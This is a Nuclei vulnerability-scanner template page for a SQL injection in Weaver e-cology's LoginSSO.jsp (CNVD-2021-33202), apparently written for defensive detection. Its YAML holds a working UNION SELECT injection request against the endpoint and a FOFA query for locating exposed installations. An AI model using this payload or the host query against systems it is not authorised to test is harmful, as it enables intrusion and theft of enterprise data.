Skip to content
Nuclei Templates

OA E-Cology LoginSSO.jsp - SQL Injection

ID: CNVD-2021-33202

Severity: high

Author: SleepingBag945

Tags: cnvd2021,cnvd,e-cology,sqli

Description

Section titled “Description”

e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.

YAML Source

Section titled “YAML Source”
id: CNVD-2021-33202


info:
  name: OA E-Cology LoginSSO.jsp - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md
    - https://www.cnblogs.com/0day-li/p/14637680.html
  classification:
    cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
    product: e-cology
    vendor: weaver
  tags: cnvd2021,cnvd,e-cology,sqli


variables:
  num: "999999999"


http:
  - raw:
      - |
        GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ed08920d0ea8055ae3acf6d093109ad0b8232c361af7f9e49d554228f393e3af022070693f5807000e05a6257d909981d79c726064b0c5548450d2ce97b54fcc42ef:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cnvd/2021/CNVD-2021-33202.yaml"

View on Github